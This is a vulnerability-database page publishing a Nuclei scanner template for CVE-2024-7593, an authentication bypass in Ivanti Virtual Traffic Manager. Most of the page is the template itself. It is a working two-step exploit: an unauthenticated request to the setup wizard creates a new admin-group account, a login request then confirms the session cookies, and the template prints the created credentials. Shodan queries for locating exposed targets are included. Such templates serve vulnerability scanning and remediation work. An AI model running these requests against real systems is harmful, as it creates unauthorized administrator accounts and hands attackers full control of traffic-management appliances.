Lucene search
K

Ivanti vTM - Authentication Bypass

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

Ivanti vTM - Authentication Bypass CVE-2024-7593 remote unauthenticated attacker bypasses admin panel authentication

Related
Refs
Code
id: CVE-2024-7593

info:
  name: Ivanti vTM - Authentication Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
  impact: |
    Unauthenticated attackers can bypass authentication to access the admin panel, gaining full administrative control of the Ivanti vTM system and potentially modifying traffic management configurations.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7593
    - https://packetstormsecurity.com/files/download/179906/ivantiadc99-bypass.txt
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-7593
    cwe-id: CWE-287
    epss-score: 0.99987
    epss-percentile: 0.99984
  metadata:
    verified: true
    max-request: 2
    vendor: ivanti
    product: virtual traffic manager
    shodan-query:
      - http.favicon.hash:1862800928
      - html:"apps/zxtm/login.cgi"
  tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev,vkev,vuln
flow: http(1) && http(2)

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1
        Host: {{Hostname}}

        _form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}

    matchers:
      - type: word
        part: body
        words:
          - "wizardtitletext"
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /apps/zxtm/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {[RootURL]}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{RootURL}}/apps/zxtm/login.cgi

        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="_form_submitted"

        form
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_username"

        {{username}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_password"

        {{password}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_submit"

        Login
        ------WebKitFormBoundarycznFUOqD0Y01A9B5--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: /apps/zxtm/"
          - "Set-Cookie: ZeusTMZAUTH="
          - "Set-Cookie: ZeusTMZAUTHTIME="
        condition: and

      - type: status
        status:
          - 302

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a00473045022100d2b458946b78c366ede2ec0fad623a162f9d5d338f9a8aa617962782671cb80c0220708522a03f885ce0b350b9c598224d800c1994674e8390f59d66b61f45d15bc8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.19.8
EPSS0.99987
SSVC
43